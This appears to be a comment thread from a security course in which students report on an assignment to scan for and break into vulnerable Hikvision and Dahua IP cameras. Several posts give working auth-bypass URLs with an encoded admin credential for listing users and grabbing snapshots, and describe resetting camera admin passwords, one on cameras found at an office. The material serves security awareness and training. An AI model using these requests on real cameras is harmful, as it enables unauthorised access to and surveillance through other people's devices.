I was working a bit in advance but will repeat again. Today I found some Dahua cameras at the office with vulnerability.

Changed password using reset utility

And I've got access to the camera. But their web interface as usual asking to install plugin million times. I could sort out the problem by changing setting of browser, installing IE Tab or using chrome://flags/#enable-npapi  but I will not in principle because interface must be user friendly and not all end-users know how to do all manipulations mentioned above.

Hacking mission completed.

Ran the scan and found several vulnerable devices.

Looks like http://hikvisionbackdoor.dyndns.org is down:

After running IPVM Vulnerability Scanner at my office network, here is the result:

Is the link you supplied shut down now?

This site can’t be reached

hikvisionbackdoor.dyndns.org took too long to respond.

Assignment 10 Homework Part 1:

Assignment 10 Part 2:

I just tried http://hikvisionbackdoor.dyndns.org and it came up "This Site Can't Be Reached".

Will try again later.

I think this device is my PS4? It's the only Sony device on my network. 

I have also been getting an error for the link.

But.... Part 1

Part 1: 

Part 2 : Hacking

First I tried the copy and past, can't believe how simple it is.

User Name and User Level:

Snap Shot of the Camera:

Changed the Password with the password reset tool:

Looks like it is working now.

Hack on the admin account was successful.

Part 01: Vulnerability found

Part 02: Hacking the camera

1) accessed the user list using

http://camera.ip/Security/users?auth=YWRtaW46MTEK

2) Changed the password

3) Changed the OSD message

4) Retrieved the snapshot using 

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK 

Again changed it to default

It appears that the website is down.

I used the suggested IP address to check the suggested camera's vulnerability.

I also used the backdoor link to check the users and roles for the cameras.

Unfortunately, I am unable to install the HikPassword Reset on my Mac.

The camera used for this assignment is online.  If you had any difficulty connecting, please try again. My apologies for any inconvenience and thank you.

I was able to do the vulnerability scan, check for users but the list seemed empty other than admin, I took a snapshot of the camera but I couldn't open the system config file.  I was able to use the password reset tool.

No luck with the laptop I have for this assignment. windows 7 I am running.

hi there

first part of this coursework to scann the camera given in this example so i dont have Access to any camera these days.

second part i have change the password but i am not able to see any image from that camera, i am not sure if i have the códec necessary for this.

regards

asking to install plug ins unable too but did gain access to the camera and reset the password

using the app i changed the password to 12345abcd

which then allowed to to access your camera and have a little fun!

I used the app to change the password and I was able to access the camera online. It kept asking for a plugin so I could view the camera but I was able to get the camera info.

Ran the vulnerability scanner and found that there are no vulnerabilities on my network. I have a HikVision CCTV System on this network so this is reassuring.

I used the HikVision Password Reset tool to change the password to 12345daniel

I was able to get into the camera with full admin rights. 

I am extremely surprised at how easy this hack is and can only imagine how many cameras are out there on the net that are vulnerable to this exploit.